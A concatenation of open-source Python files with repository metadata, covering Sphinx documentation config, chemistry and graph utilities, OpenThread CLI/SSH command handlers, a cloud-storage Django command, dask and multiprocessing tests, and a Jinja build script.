# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
#
# NOTE: in these docs all .py scripts are assumed to be bokeh plot scripts!
# bokeh_plot_pyfile_include_dirs sets the folders to search for .py files
bokeh_plot_pyfile_include_dirs = ['docs']
# Whether to allow builds to succeed if a Google API key is not defined and plots
# containing "GOOGLE_API_KEY" are processed
bokeh_missing_google_api_key_ok = False
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# Sort members by type
autodoc_member_order = 'groupwise'
# patterns to exclude
exclude_patterns = ['docs/releases/*']
# This would more properly be done with rst_epilog but something about
# the combination of this with the bokeh-gallery directive breaks the build
rst_prolog = """
.. |Color| replace:: :py:class:`~bokeh.core.properties.Color`
.. |DataSpec| replace:: :py:class:`~bokeh.core.properties.DataSpec`
.. |Document| replace:: :py:class:`~bokeh.document.Document`
.. |HasProps| replace:: :py:class:`~bokeh.core.has_props.HasProps`
.. |Model| replace:: :py:class:`~bokeh.model.Model`
.. |Property| replace:: :py:class:`~bokeh.core.property.bases.Property`
.. |PropertyDescriptor| replace:: :py:class:`~bokeh.core.property.descriptor.PropertyDescriptor`
.. |PropertyContainer| replace:: :py:class:`~bokeh.core.property.wrappers.PropertyContainer`
.. |UnitsSpec| replace:: :py:class:`~bokeh.core.properties.UnitsSpec`
.. |field| replace:: :py:func:`~bokeh.core.properties.field`
.. |value| replace:: :py:func:`~bokeh.core.properties.value`
"""
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'bokeh_theme'
html_theme_path = ['.']
html_context = {
'SITEMAP_BASE_URL': 'https://bokeh.pydata.org/en/', # Trailing slash is needed
'DESCRIPTION': 'Bokeh visualization library, documentation site.',
'AUTHOR': 'Bokeh contributors',
'VERSION': version,
'NAV': (
('Github', '//github.com/bokeh/bokeh'),
),
'ABOUT': (
('Vision and Work', 'vision'),
('Team', 'team'),
('Citation', 'citation'),
('Contact', 'contact'),
),
'SOCIAL': (
('Contribute', 'contribute'),
('Mailing list', '//groups.google.com/a/anaconda.com/forum/#!forum/bokeh'),
('Github', '//github.com/bokeh/bokeh'),
('Twitter', '//twitter.com/BokehPlots'),
),
'NAV_DOCS': (
('Installation', 'installation'),
('User Guide', 'user_guide'),
('Gallery', 'gallery'),
('Tutorial', 'https://mybinder.org/v2/gh/bokeh/bokeh-notebooks/master?filepath=tutorial%2F00%20-%20Introduction%20and%20Setup.ipynb'),
('Reference', 'reference'),
('Releases', 'releases'),
('Developer Guide', 'dev_guide'),
),
'ALL_VERSIONS': all_versions,
}
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = True
# Output file base name for HTML help builder.
htmlhelp_basename = 'Bokehdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Bokeh.tex', u'Bokeh Documentation', u'Anaconda', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bokeh', u'Bokeh Documentation',
[u'Anaconda'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Bokeh', u'Bokeh Documentation', u'Anaconda', 'Bokeh', 'Interactive Web Plotting for Python', 'Graphics'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# intersphinx settings
intersphinx_mapping = {
'python': ('https://docs.python.org/', None),
'pandas': ('http://pandas.pydata.org/pandas-docs/stable/', None),
'numpy': ('http://docs.scipy.org/doc/numpy/', None)
}
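# Illustrative note (added for clarity): with the mapping above, a cross-reference
# such as :class:`numpy.ndarray` that is not defined locally should resolve against
# the external numpy documentation via intersphinx.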
|
mindriot101/bokeh
|
sphinx/source/conf.py
|
Python
|
bsd-3-clause
| 9,540
|
from __future__ import print_function
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit.Chem.PyMol import MolViewer
from rdkit.Chem.Subshape import SubshapeBuilder,SubshapeObjects,SubshapeAligner
from rdkit.six.moves import cPickle
import copy
m1 = Chem.MolFromMolFile('test_data/square1.mol')
m2 = Chem.MolFromMolFile('test_data/square2.mol')
b = SubshapeBuilder.SubshapeBuilder()
b.gridDims=(10.,10.,5)
b.gridSpacing=0.4
b.winRad=2.0
if 1:
print('m1:')
s1 = b.GenerateSubshapeShape(m1)
cPickle.dump(s1,file('test_data/square1.shp.pkl','wb+'))
print('m2:')
s2 = b.GenerateSubshapeShape(m2)
cPickle.dump(s2,file('test_data/square2.shp.pkl','wb+'))
ns1 = b.CombineSubshapes(s1,s2)
b.GenerateSubshapeSkeleton(ns1)
cPickle.dump(ns1,file('test_data/combined.shp.pkl','wb+'))
else:
s1 = cPickle.load(file('test_data/square1.shp.pkl','rb'))
s2 = cPickle.load(file('test_data/square2.shp.pkl','rb'))
#ns1 = cPickle.load(file('test_data/combined.shp.pkl','rb'))
ns1=cPickle.load(file('test_data/combined.shp.pkl','rb'))
v = MolViewer()
SubshapeObjects.DisplaySubshape(v,s1,'shape1')
SubshapeObjects.DisplaySubshape(v,ns1,'ns1')
#SubshapeObjects.DisplaySubshape(v,s2,'shape2')
a = SubshapeAligner.SubshapeAligner()
pruneStats={}
algs =a.GetSubshapeAlignments(None,ns1,m1,s1,b,pruneStats=pruneStats)
print(len(algs))
print(pruneStats)
import os,tempfile
from rdkit import Geometry
fName = tempfile.mktemp('.grd')
Geometry.WriteGridToFile(ns1.coarseGrid.grid,fName)
v.server.loadSurface(fName,'coarse','',2.5)
os.unlink(fName)
fName = tempfile.mktemp('.grd')
Geometry.WriteGridToFile(ns1.medGrid.grid,fName)
v.server.loadSurface(fName,'med','',2.5)
os.unlink(fName)
|
soerendip42/rdkit
|
rdkit/Chem/Subshape/testCombined.py
|
Python
|
bsd-3-clause
| 1,702
|
#!/usr/bin/env python3
#
# Copyright (c) 2020, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import logging
import queue
import re
import threading
import time
from abc import abstractmethod
from typing import Any, Callable, Optional, Union, List, Pattern
from .connectors import OtCliHandler
from .errors import ExpectLineTimeoutError, CommandError
from .utils import match_line
class OTCommandHandler:
"""This abstract class defines interfaces of a OT Command Handler."""
@abstractmethod
def execute_command(self, cmd: str, timeout: float) -> List[str]:
"""Method execute_command should execute the OT CLI command within a timeout (in seconds) and return the
command output as a list of lines.
Note: each line SHOULD NOT contain '\r\n' at the end. The last line of output should be 'Done' or
'Error <code>: <msg>' following OT CLI conventions.
"""
pass
@abstractmethod
def close(self):
"""Method close should close the OT Command Handler."""
pass
@abstractmethod
def wait(self, duration: float) -> List[str]:
"""Method wait should wait for a given duration and return the OT CLI output during this period.
Normally, OT CLI does not output when it's not executing any command. But OT CLI can also output
asynchronously in some cases (e.g. `Join Success` when Joiner joins successfully).
"""
pass
@abstractmethod
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
"""Method set_line_read_callback should register a callback that will be called for every line
output by the OT CLI.
This is useful for handling asynchronous command output while still being able to execute
other commands.
"""
pass
def shell(self, cmd: str, timeout: float) -> List[str]:
raise NotImplementedError("shell command is not supported on %s" % self.__class__.__name__)
class OtCliCommandRunner(OTCommandHandler):
__PATTERN_COMMAND_DONE_OR_ERROR = re.compile(
r'(Done|Error|Error \d+:.*|.*: command not found)$') # "Error" for spinel-cli.py
__PATTERN_LOG_LINE = re.compile(r'((\[(NONE|CRIT|WARN|NOTE|INFO|DEBG)\])'
r'|(-.*-+: )' # e.g. -CLI-----:
r')')
"""regex used to filter logs"""
__ASYNC_COMMANDS = {'scan', 'ping', 'discover'}
def __init__(self, otcli: OtCliHandler, is_spinel_cli=False):
self.__otcli: OtCliHandler = otcli
self.__is_spinel_cli = is_spinel_cli
self.__expect_command_echoback = not self.__is_spinel_cli
self.__line_read_callback = None
self.__pending_lines = queue.Queue()
self.__should_close = threading.Event()
self.__otcli_reader = threading.Thread(target=self.__otcli_read_routine)
self.__otcli_reader.setDaemon(True)
self.__otcli_reader.start()
def __repr__(self):
return repr(self.__otcli)
def execute_command(self, cmd, timeout=10) -> List[str]:
assert not self.__should_close.is_set(), "OT CLI is already closed."
self.__otcli.writeline(cmd)
if cmd in ('reset', 'factoryreset'):
self.wait(3)
self.__otcli.writeline('extaddr')
self.wait(1)
return []
if self.__expect_command_echoback:
self.__expect_line(timeout, cmd)
output = self.__expect_line(timeout,
OtCliCommandRunner.__PATTERN_COMMAND_DONE_OR_ERROR,
asynchronous=cmd.split()[0] in OtCliCommandRunner.__ASYNC_COMMANDS)
return output
def wait(self, duration: float) -> List[str]:
self.__otcli.wait(duration)
output = []
try:
while True:
line = self.__pending_lines.get_nowait()
output.append(line)
except queue.Empty:
pass
return output
def close(self):
self.__should_close.set()
self.__otcli.close()
self.__otcli_reader.join()
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
self.__line_read_callback = callback
#
# Private methods
#
def __expect_line(self, timeout: float, expect_line: Union[str, Pattern], asynchronous=False) -> List[str]:
output = []
if not asynchronous:
while True:
try:
line = self.__pending_lines.get(timeout=timeout)
except queue.Empty:
raise ExpectLineTimeoutError(expect_line)
output.append(line)
if match_line(line, expect_line):
break
else:
done = False
while not done and timeout > 0:
lines = self.wait(1)
timeout -= 1
for line in lines:
output.append(line)
if match_line(line, expect_line):
done = True
break
if not done:
raise ExpectLineTimeoutError(expect_line)
return output
def __otcli_read_routine(self):
while not self.__should_close.is_set():
try:
line = self.__otcli.readline()
except Exception:
if self.__should_close.is_set():
break
else:
raise
logging.debug('%s: %r', self.__otcli, line)
if line is None:
break
if line.startswith('> '):
line = line[2:]
if self.__line_read_callback is not None:
self.__line_read_callback(line)
logging.debug('%s: %s', self.__otcli, line)
if not OtCliCommandRunner.__PATTERN_LOG_LINE.match(line):
self.__pending_lines.put(line)
class OtbrSshCommandRunner(OTCommandHandler):
def __init__(self, host, port, username, password, sudo):
import paramiko
self.__host = host
self.__port = port
self.__sudo = sudo
self.__ssh = paramiko.SSHClient()
self.__ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.__line_read_callback = None
try:
self.__ssh.connect(host,
port=port,
username=username,
password=password,
allow_agent=False,
look_for_keys=False)
except paramiko.ssh_exception.AuthenticationException:
if not password:
self.__ssh.get_transport().auth_none(username)
else:
raise
def __repr__(self):
return f'{self.__host}:{self.__port}'
def execute_command(self, cmd: str, timeout: float) -> List[str]:
sh_cmd = f'ot-ctl {cmd}'
if self.__sudo:
sh_cmd = 'sudo ' + sh_cmd
output = self.shell(sh_cmd, timeout=timeout)
if self.__line_read_callback is not None:
for line in output:
self.__line_read_callback(line)
if cmd in ('reset', 'factoryreset'):
self.wait(3)
return output
def shell(self, cmd: str, timeout: float) -> List[str]:
cmd_in, cmd_out, cmd_err = self.__ssh.exec_command(cmd, timeout=int(timeout), bufsize=1024)
errput = [l.rstrip('\r\n') for l in cmd_err.readlines()]
output = [l.rstrip('\r\n') for l in cmd_out.readlines()]
if errput:
raise CommandError(cmd, errput)
return output
def close(self):
self.__ssh.close()
def wait(self, duration: float) -> List[str]:
time.sleep(duration)
return []
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
self.__line_read_callback = callback
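def _example_handler_usage(handler: OTCommandHandler) -> None:
    """Illustrative sketch (editor's addition, not part of the upstream module).
    Demonstrates the OTCommandHandler interface defined above; the 'state' command and
    the logging calls are assumptions chosen only for demonstration.
    """
    # Log every line the CLI emits, including asynchronous output such as 'Join Success'.
    handler.set_line_read_callback(lambda line: logging.debug('async line: %s', line))
    # Run a command; per the interface contract the last output line is 'Done' or 'Error ...'.
    output = handler.execute_command('state', timeout=10)
    # Collect any asynchronous output for one more second, then release resources.
    output += handler.wait(1)
    logging.info('state output: %s', output)
    handler.close()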
|
jwhui/openthread
|
tools/otci/otci/command_handlers.py
|
Python
|
bsd-3-clause
| 9,542
|
#
# stage.py -- Classes for pipeline stages
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from ginga.misc import Bunch
#__all__ = ['Pipeline']
class StageError(Exception):
pass
class Stage(object):
"""Class to handle a pipeline stage."""
_stagename = 'generic'
def __init__(self):
super(Stage, self).__init__()
# default name, until user changes it
self.name = str(self)
# for holding widgets
self.w = Bunch.Bunch()
self._bypass = False
# these get assigned by the owning pipeline
self.pipeline = None
self.logger = None
self.result = None
self.gui_up = False
def build_gui(self, container):
"""subclass can override this to build some kind of GUI."""
pass
def start(self):
"""subclass can override this to do any necessary setup."""
pass
def stop(self):
"""subclass can override this to do any necessary teardown."""
pass
def pause(self):
"""subclass can override this to do any necessary teardown."""
pass
def resume(self):
"""subclass can override this to do any necessary teardown."""
pass
def invalidate(self):
"""subclass can override this to do any necessary invalidation."""
pass
def bypass(self, tf):
self._bypass = tf
def verify_2d(self, data):
if data is not None and len(data.shape) < 2:
raise StageError("Expecting a 2D or greater array in final stage")
def export_as_dict(self):
d = dict(name=self.name, type=self._stagename, bypass=self._bypass)
return d
def import_from_dict(self, d):
self.name = d['name']
self._bypass = d['bypass']
def __str__(self):
return self._stagename
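def _example_stage_roundtrip():
    """Illustrative sketch (editor's addition, not part of ginga): exercises only the
    serialization helpers defined on Stage above; 'flat-field' is a hypothetical name.
    """
    st = Stage()
    st.name = 'flat-field'
    st.bypass(True)
    # export_as_dict() captures the stage name, type and bypass flag ...
    settings = st.export_as_dict()
    # ... and import_from_dict() restores them onto another instance.
    restored = Stage()
    restored.import_from_dict(settings)
    return restored.name, restored._bypass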
|
pllim/ginga
|
ginga/util/stages/base.py
|
Python
|
bsd-3-clause
| 1,889
|
import optparse
import pyrax
import swiftclient
from django.core.management.base import BaseCommand, CommandError
from cumulus.settings import CUMULUS
def cdn_enabled_for_container(container):
"""pyrax.cf_wrapper.CFClient assumes cdn_connection.
Currently the pyrax swift client wrapper assumes that if
you're using pyrax, you're using the CDN support that's
only available with the rackspace openstack.
This can be removed once the following pull-request lands
(or is otherwise resolved):
https://github.com/rackspace/pyrax/pull/254
"""
try:
return container.cdn_enabled
except AttributeError:
return False
class Command(BaseCommand):
help = "Create a container."
args = "[container_name]"
option_list = BaseCommand.option_list + (
optparse.make_option("-p", "--private", action="store_true", default=False,
dest="private", help="Make a private container."),)
def connect(self):
"""
Connects using the swiftclient api.
"""
self.conn = swiftclient.Connection(authurl=CUMULUS["AUTH_URL"],
user=CUMULUS["USERNAME"],
key=CUMULUS["API_KEY"],
snet=CUMULUS["SERVICENET"],
auth_version=CUMULUS["AUTH_VERSION"],
tenant_name=CUMULUS["AUTH_TENANT_NAME"])
def handle(self, *args, **options):
if len(args) != 1:
raise CommandError("Pass one and only one [container_name] as an argument")
self.connect()
container_name = args[0]
print("Creating container: {0}".format(container_name))
self.conn.put_container(container_name)
if not options.get("private"):
print("Publish container: {0}".format(container_name))
headers = {"X-Container-Read": ".r:*"}
self.conn.post_container(container_name, headers=headers)
if CUMULUS["USE_PYRAX"]:
if CUMULUS["PYRAX_IDENTITY_TYPE"]:
pyrax.set_setting("identity_type", CUMULUS["PYRAX_IDENTITY_TYPE"])
pyrax.set_credentials(CUMULUS["USERNAME"], CUMULUS["API_KEY"])
public = not CUMULUS["SERVICENET"]
connection = pyrax.connect_to_cloudfiles(region=CUMULUS["REGION"],
public=public)
container = connection.get_container(container_name)
if cdn_enabled_for_container(container):
container.make_public(ttl=CUMULUS["TTL"])
|
absoludity/django-cumulus
|
cumulus/management/commands/container_create.py
|
Python
|
bsd-3-clause
| 2,713
|
#!/usr/bin/python
#
# This file is part of CONCUSS, https://github.com/theoryinpractice/concuss/,
# and is Copyright (C) North Carolina State University, 2015. It is licensed
# under the three-clause BSD license; see LICENSE.
#
from lib.util.memorized import memorized
from lib.graph.graph import Graph
# Calculate one transitive-fraternal-augmentation-step and
# result a tuple (newgraph, transedges, fratedges)
@memorized(['orig', 'step'])
def trans_frater_augmentation(orig, g, trans, frat, col,
nodes, step, td, ldoFunc):
fratGraph = Graph()
newTrans = {}
for v in g:
for x, y, _, in g.trans_trips(v):
newTrans[(x, y)] = step
assert (not g.adjacent(x, y)), \
"{0} {1} transitive but adjacent".format(x, y)
for x, y, _ in g.frat_trips(v):
fratGraph.add_edge(x, y)
assert (not g.adjacent(x, y)), \
"{0} {1} fraternal but adjacent".format(x, y)
for (s, t) in newTrans.keys():
g.add_arc(s, t, 1)
fratGraph.remove_edge(s, t)
# TODO: support dict to see current in-degree...
fratDigraph = ldoFunc(fratGraph)
# calculate result
trans.update(newTrans)
for s, t, _ in fratDigraph.arcs():
frat[(s, t)] = step
g.add_arc(s, t, 1)
return (g, trans, frat)
# end def
|
nish10z/CONCUSS
|
lib/coloring/basic/trans_frater_augmentation.py
|
Python
|
bsd-3-clause
| 1,365
|
import numpy as np
import pytest
pytestmark = pytest.mark.gpu
import dask.array as da
from dask.array.gufunc import apply_gufunc
from dask.array.utils import assert_eq
cupy = pytest.importorskip("cupy")
def test_apply_gufunc_axis():
def mydiff(x):
return np.diff(x)
a = cupy.random.randn(3, 6, 4)
da_ = da.from_array(a, chunks=2, asarray=False)
m = np.diff(a, axis=1)
dm = apply_gufunc(
mydiff, "(i)->(i)", da_, axis=1, output_sizes={"i": 5}, allow_rechunk=True
)
assert_eq(m, dm)
|
dask/dask
|
dask/array/tests/test_cupy_gufunc.py
|
Python
|
bsd-3-clause
| 532
|
#
# A test file for the `processing` package
#
import time, sys, random
from Queue import Empty
import processing # may get overwritten
#### TEST_VALUE
def value_func(running, mutex):
random.seed()
time.sleep(random.random()*4)
mutex.acquire()
print '\n\t\t\t' + str(processing.currentProcess()) + ' has finished'
running.value -= 1
mutex.release()
def test_value():
TASKS = 10
running = processing.Value('i', TASKS)
mutex = processing.Lock()
for i in range(TASKS):
processing.Process(target=value_func, args=(running, mutex)).start()
while running.value > 0:
time.sleep(0.08)
mutex.acquire()
print running.value,
sys.stdout.flush()
mutex.release()
print
print 'No more running processes'
#### TEST_QUEUE
def queue_func(queue):
for i in range(30):
time.sleep(0.5 * random.random())
queue.put(i*i)
queue.put('STOP')
def test_queue():
q = processing.Queue()
p = processing.Process(target=queue_func, args=(q,))
p.start()
o = None
while o != 'STOP':
try:
o = q.get(timeout=0.3)
print o,
sys.stdout.flush()
except Empty:
print 'TIMEOUT'
print
#### TEST_CONDITION
def condition_func(cond):
cond.acquire()
print '\t' + str(cond)
time.sleep(2)
print '\tchild is notifying'
print '\t' + str(cond)
cond.notify()
cond.release()
def test_condition():
cond = processing.Condition()
p = processing.Process(target=condition_func, args=(cond,))
print cond
cond.acquire()
print cond
cond.acquire()
print cond
p.start()
print 'main is waiting'
cond.wait()
print 'main has woken up'
print cond
cond.release()
print cond
cond.release()
p.join()
print cond
#### TEST_SEMAPHORE
def semaphore_func(sema, mutex, running):
sema.acquire()
mutex.acquire()
running.value += 1
print running.value, 'tasks are running'
mutex.release()
random.seed()
time.sleep(random.random()*2)
mutex.acquire()
running.value -= 1
print '%s has finished' % processing.currentProcess()
mutex.release()
sema.release()
def test_semaphore():
sema = processing.Semaphore(3)
mutex = processing.RLock()
running = processing.Value('i', 0)
processes = [
processing.Process(target=semaphore_func, args=(sema, mutex, running))
for i in range(10)
]
for p in processes:
p.start()
for p in processes:
p.join()
#### TEST_JOIN_TIMEOUT
def join_timeout_func():
print '\tchild sleeping'
time.sleep(5.5)
print '\n\tchild terminating'
def test_join_timeout():
p = processing.Process(target=join_timeout_func)
p.start()
print 'waiting for process to finish'
while 1:
p.join(timeout=1)
if not p.isAlive():
break
print '.',
sys.stdout.flush()
#### TEST_EVENT
def event_func(event):
print '\t%r is waiting' % processing.currentProcess()
event.wait()
print '\t%r has woken up' % processing.currentProcess()
def test_event():
event = processing.Event()
processes = [processing.Process(target=event_func, args=(event,))
for i in range(5)]
for p in processes:
p.start()
print 'main is sleeping'
time.sleep(2)
print 'main is setting event'
event.set()
for p in processes:
p.join()
#### TEST_SHAREDVALUES
def sharedvalues_func(values, arrays, shared_values, shared_arrays):
for i in range(len(values)):
v = values[i][1]
sv = shared_values[i].value
assert v == sv
for i in range(len(values)):
a = arrays[i][1]
sa = list(shared_arrays[i][:])
assert a == sa
print 'Tests passed'
def test_sharedvalues():
values = [
('i', 10),
('h', -2),
('d', 1.25)
]
arrays = [
('i', range(100)),
('d', [0.25 * i for i in range(100)]),
('H', range(1000))
]
shared_values = [processing.Value(id, v) for id, v in values]
shared_arrays = [processing.Array(id, a) for id, a in arrays]
p = processing.Process(
target=sharedvalues_func,
args=(values, arrays, shared_values, shared_arrays)
)
p.start()
p.join()
assert p.getExitCode() == 0
####
def test(namespace=processing):
global processing
processing = namespace
for func in [ test_value, test_queue, test_condition,
test_semaphore, test_join_timeout, test_event,
test_sharedvalues ]:
print '\n\t######## %s\n' % func.__name__
func()
ignore = processing.activeChildren() # cleanup any old processes
if hasattr(processing, '_debugInfo'):
info = processing._debugInfo()
if info:
print info
raise ValueError, 'there should be no positive refcounts left'
if __name__ == '__main__':
processing.freezeSupport()
assert len(sys.argv) in (1, 2)
if len(sys.argv) == 1 or sys.argv[1] == 'processes':
print ' Using processes '.center(79, '-')
namespace = processing
elif sys.argv[1] == 'manager':
print ' Using processes and a manager '.center(79, '-')
namespace = processing.Manager()
namespace.Process = processing.Process
namespace.currentProcess = processing.currentProcess
namespace.activeChildren = processing.activeChildren
elif sys.argv[1] == 'threads':
print ' Using threads '.center(79, '-')
import processing.dummy as namespace
else:
print 'Usage:\n\t%s [processes | manager | threads]' % sys.argv[0]
raise SystemExit, 2
test(namespace)
|
seishei/multiprocess
|
py2.5/examples/ex_synchronize.py
|
Python
|
bsd-3-clause
| 6,159
|
#!/usr/bin/env python
#
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Renders one or more template files using the Jinja template engine."""
import codecs
import argparse
import os
import sys
from util import build_utils
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir))
from pylib.constants import host_paths
# Import jinja2 from third_party/jinja2
sys.path.append(os.path.join(host_paths.DIR_SOURCE_ROOT, 'third_party'))
import jinja2 # pylint: disable=F0401
class _RecordingFileSystemLoader(jinja2.FileSystemLoader):
def __init__(self, searchpath):
jinja2.FileSystemLoader.__init__(self, searchpath)
self.loaded_templates = set()
def get_source(self, environment, template):
contents, filename, uptodate = jinja2.FileSystemLoader.get_source(
self, environment, template)
self.loaded_templates.add(os.path.relpath(filename))
return contents, filename, uptodate
class JinjaProcessor(object):
"""Allows easy rendering of jinja templates with input file tracking."""
def __init__(self, loader_base_dir, variables=None):
self.loader_base_dir = loader_base_dir
self.variables = variables or {}
self.loader = _RecordingFileSystemLoader(loader_base_dir)
self.env = jinja2.Environment(loader=self.loader)
self.env.undefined = jinja2.StrictUndefined
self.env.line_comment_prefix = '##'
self.env.trim_blocks = True
self.env.lstrip_blocks = True
self._template_cache = {} # Map of path -> Template
def Render(self, input_filename, variables=None):
input_rel_path = os.path.relpath(input_filename, self.loader_base_dir)
template = self._template_cache.get(input_rel_path)
if not template:
template = self.env.get_template(input_rel_path)
self._template_cache[input_rel_path] = template
return template.render(variables or self.variables)
def GetLoadedTemplates(self):
return list(self.loader.loaded_templates)
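def _ExampleRenderTemplate(template_dir, template_name):
  """Illustrative sketch (editor's addition, not part of the build script).
  The directory and file names passed in are hypothetical; this only shows how
  JinjaProcessor caches templates and records every file the loader touched.
  """
  processor = JinjaProcessor(template_dir, variables={'channel': 'beta'})
  # Render() resolves the input path relative to the loader base directory.
  rendered = processor.Render(os.path.join(template_dir, template_name))
  # GetLoadedTemplates() lists the template plus anything it included or imported.
  return rendered, processor.GetLoadedTemplates()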
def _ProcessFile(processor, input_filename, output_filename):
output = processor.Render(input_filename)
with codecs.open(output_filename, 'w', 'utf-8') as output_file:
output_file.write(output)
def _ProcessFiles(processor, input_filenames, inputs_base_dir, outputs_zip):
with build_utils.TempDir() as temp_dir:
for input_filename in input_filenames:
relpath = os.path.relpath(os.path.abspath(input_filename),
os.path.abspath(inputs_base_dir))
if relpath.startswith(os.pardir):
raise Exception('input file %s is not contained in inputs base dir %s'
% (input_filename, inputs_base_dir))
output_filename = os.path.join(temp_dir, relpath)
parent_dir = os.path.dirname(output_filename)
build_utils.MakeDirectory(parent_dir)
_ProcessFile(processor, input_filename, output_filename)
build_utils.ZipDir(outputs_zip, temp_dir)
def _ParseVariables(variables_arg, error_func):
variables = {}
for v in build_utils.ParseGnList(variables_arg):
if '=' not in v:
error_func('--variables argument must contain "=": ' + v)
name, _, value = v.partition('=')
variables[name] = value
return variables
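# Illustrative invocation (editor's addition): the flag names match the argparse options
# defined in main() below, but the paths and variable values are hypothetical.
#
#   python jinja_template.py \
#       --inputs some/dir/AndroidManifest.xml.jinja2 \
#       --output out/AndroidManifest.xml \
#       --variables "channel=beta mstone=39"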
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--inputs', required=True,
help='The template files to process.')
parser.add_argument('--output', help='The output file to generate. Valid '
'only if there is a single input.')
parser.add_argument('--outputs-zip', help='A zip file for the processed '
'templates. Required if there are multiple inputs.')
parser.add_argument('--inputs-base-dir', help='A common ancestor directory '
'of the inputs. Each output\'s path in the output zip '
'will match the relative path from INPUTS_BASE_DIR to '
'the input. Required if --output-zip is given.')
parser.add_argument('--loader-base-dir', help='Base path used by the '
'template loader. Must be a common ancestor directory of '
'the inputs. Defaults to DIR_SOURCE_ROOT.',
default=host_paths.DIR_SOURCE_ROOT)
parser.add_argument('--variables', help='Variables to be made available in '
'the template processing environment, as a GYP list '
'(e.g. --variables "channel=beta mstone=39")', default='')
build_utils.AddDepfileOption(parser)
options = parser.parse_args()
inputs = build_utils.ParseGnList(options.inputs)
if (options.output is None) == (options.outputs_zip is None):
parser.error('Exactly one of --output and --output-zip must be given')
if options.output and len(inputs) != 1:
parser.error('--output cannot be used with multiple inputs')
if options.outputs_zip and not options.inputs_base_dir:
parser.error('--inputs-base-dir must be given when --output-zip is used')
variables = _ParseVariables(options.variables, parser.error)
processor = JinjaProcessor(options.loader_base_dir, variables=variables)
if options.output:
_ProcessFile(processor, inputs[0], options.output)
else:
_ProcessFiles(processor, inputs, options.inputs_base_dir,
options.outputs_zip)
if options.depfile:
output = options.output or options.outputs_zip
deps = processor.GetLoadedTemplates()
build_utils.WriteDepfile(options.depfile, output, deps)
if __name__ == '__main__':
main()
|
chrisdickinson/nojs
|
build/android/gyp/jinja_template.py
|
Python
|
bsd-3-clause
| 5,601
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2018, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
